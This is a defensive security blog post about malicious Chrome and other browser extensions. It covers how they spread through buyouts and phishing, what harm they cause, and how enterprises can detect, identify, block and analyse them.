In recent years browser extensions have become another unheralded avenue for attackers to steal passwords, exfiltrate data, identify users, and generate advertising revenue. It has been used by both nation-states and e-crime. The reason you should care is because there's almost no coverage from security tools and few enterprise controls. It's the malicious code in your enterprise that any user can download and that no one is looking for.
Chrome, Firefox, and Edge each have their own ecosystems for browser extensions and there's malware in all of them. But Chrome is arguably the most common ecosystem and a number of Chromium based browsers (Brave, Opera, Vivaldi) also support Chrome extensions. I've been shocked by the sheer number of malicious extensions that were identified and removed from the Chrome Web Store but are still running on end user systems. Google can update your Chrome extensions automatically, but for some reason isn't removing malicious extensions even when they've been removed from the Chrome Web Store.
A lot of research in this space already exists on the Internet and I'll link to it accordingly.
Typical Scenarios For Malicious Extensions
- An author for a legitimate extension gets a buyout offer and sells the extension. The buyer is actually an attacker who wants to quickly infect a million users. The attacker creates a new update with malicious code, Chrome updates the extension automatically on end user systems, and now a million users who had a legitimate extension now get updated with malware. See Better History and The Great Suspender for examples. We have also seen this happen through account takeovers where the extension author is locked out of their account and an attacker adds a malicious update.
- User is tricked into installing a malicious extension through phishing or malvertisement. A Russian APT used this technique in 2015 and a North Korean APT did this in 2018. But there's plenty of eCrime campaigns using this for adware and monetization.
- User downloads an extension that appears to be useful but is trojanized with malware/adware. Some legitimate extensions have evil doppelgangers with malware added.
The Dangers
What is the potential for damage? More than you might expect.
- Credential theft (See MEGA extension)
- Access/exfiltrate any data in the browser
- Injecting javascript or advertisements into any page (One campaign pushed a tech support scam)
- Injecting malware into websites you edit (See LNKR campaign)
- Hijack searches
- Track browsing behavior
- Change browser settings
- Take screenshots
- Read clipboard
How To Identify and Stop Malicious Extensions In Your Enterprise
Enterprise controls around browser extensions are severely lacking. Very few security tools even cover this space. Malwarebytes is one of the few that identifies malicious extensions on scans. What are our options?
Detection Via Domain Callbacks
Most malicious browser extensions need to reach out to the Internet to exfiltrate data, download the next stage of malicious code or to get the next advertisement. Detecting these domains in your DNS/proxy logs is a great way to detect malicious extensions in your environment.
Malicious browser extensions seem to come in campaigns and related malicious extensions tend to call out to the same domains/networks. It's the method I've been using to identify clusters/campaigns of extensions.
Where do we get these malicious domains? Again, open source intelligence is your friend. Reports on newly found malicious extensions often include these domains. Threat intelligence firms don't seem to specifically cover this space either. The proxy service I use does identify a lot of these domains as malicious but doesn't directly relate them to extensions. Another option is once you begin finding and analyzing malicious extensions there's often related domains in the code (sometimes they're heavily obfuscated, sometimes not) and you can begin adding your own research.
If you have EDR and an enterprise proxy, try looking for systems with repeated blocks to domains where the DNS request is from Chrome. Sometimes it's just web browsing, but when a user is hitting the same blocked site regularly over time it's worth an investigation.
Group Policy
Group Policy can be used for whitelisting or blacklisting extensions.
Whitelisting: Blocking all extensions except for ones the company approves is the most secure way to handle this problem, but it will also cause the Help Desk a lot of grief as users start making complaints and requests to whitelist extensions. It's also possible to install copies of the browser that don't adhere to the group policy. Users love to get around security controls.
Blacklisting: Blocking known bad extensions is a low impact way to stop these attacks but leaves you open to the next malicious extension. I haven't found any threat intelligence firms that cover browser extensions but there's a vast amount of open source research available.
Custom Tools
When I said enterprise controls around browser extensions were lacking, I wasn't kidding. I've had to build my own tools to List/Disable/Download extensions. I'll be releasing some of these on Github.
Removing Chrome extensions remotely is a tricky business. If you delete the extension folder from the host and the extension still exists in the Chrome Web Store (Google isn't always receptive to these reports) it can be re-downloaded.
Challenges
Identifying Extensions
Unless you're in the browser's UI, extensions are not easily identifiable. Chrome extensions use a 32 character code to identify the extension.
You probably don't have these memorized. But if the Chrome extension is in the Chrome Web Store, you can find out what extension it is by going to https://chrome.google.com/webstore/detail/<extension code> or the title is sometimes in the manifest.json (mostly not, though). First thing I did was build a script to identify extensions using these methods.
If the title is not in the Chrome Web Store or manifest.json file, and it's not one of the default extensions installed with Chrome, identifying it can be tricky. Try Google or a service like Crxcavator.io or Crx4Chrome.
Internet Edge extensions appear to be similarly identifiable by going to Microsoft's extensions site: https://microsoftedge.microsoft.com/addons/detail/<extension code>
For Firefox, identification isn't quite so easy. The extensions are zipped into .xpi files and I haven't been able to easily tie the extension code back to the Firefox Browser Add-Ons page.
Enterprise Wide Identification
It would be nice if there was a tool that allowed us to see all installed browser extensions across the environment. This doesn't currently exist in my experience. My current thought would be to run my ListChromeExtensions script across all hosts in the enterprise and dump the output to a database/logging platform on a regular basis. It wouldn't give an up to the minute account of all installed extensions, but it would be an improvement over what currently exists.
How Do We Determine If An Extension Is Malicious?
This is the $25 million dollar question. It's not a simple problem. Attackers insert their own functions into existing libraries (like jQuery) or insert additional malicious code or functions into otherwise legitimate javascript. More recently they're downloading code from a C2 server, so the malicious code is never even on the file system.
Analyze The Code
Put your javascript hat on. Analyzing the code in Chrome extensions is not a simple task nor is it a complete one. But it's the best way to find unknown malicious extensions.
In 2018 Google announced it would no longer allow extensions with obfuscated code. But obfuscated is definitely still getting through.
Quick things to look for that increase suspicion:
- Sometimes the code includes the callback domains in plaintext.
- Look for code obfuscation in automatically called scripts. If the code is hiding something, it's a red flag.
- Look for unnecessary permissions in the manifest.json
- Look for unsafe eval in content_security_policy in the manifest.json
Code analysis may be the only way to accurately determine if an extension is malicious but it's as slow as reversing malware. It's also useful if you can diff previous versions of the code to find the code changes (Previous versions are sometimes available at Crx4Chrome).
Check Reviews
Often the reviews in the Chrome Web Store are indicative of bad behavior. If people are encountering pop ups or malware, they often post about it. But the bad guys are also posting fake reviews and Krebs wrote a recent article about it. This seems like a good avenue for future research. Find the fake reviews, find the malicious extensions.
Check the Extension On Crxcavator.io
Crxcavator scans extensions currently in the web store and reports risk levels. It's a useful tool for analysis but doesn't indicate whether an extension is actually malicious. Another tool in the toolbox.
Chrome Sync
Do you allow users in your environment to use Chrome sync? If so, they're copying all of their settings including malicious Chrome extensions and malicious Chrome notifications into your enterprise. Not to mention it's a data exfiltration path you probably haven't considered.
I haven't found a lot of research on Chrome Sync but I've definitely found malicious extensions synched and re-downloaded by a user after I removed them. I've also seen Chrome Sync trying to download Chrome extensions from malicious web sites (this was possible before 2015).
In Closing
Browser extensions are the wild west of malware at the moment. There's little visibility, almost no enterprise security tools to help, and it's as effective as a supply chain attack at reaching large audiences. Expect more attacks.
I anticipate the need to write more on this topic. I think it's worth sharing some of the tools I've developed to help identify extensions.
Other Interesting Reports
Awake Security: Malicious Domain Registrars
Duo Report on Malvertising Campaign
No comments:
Post a Comment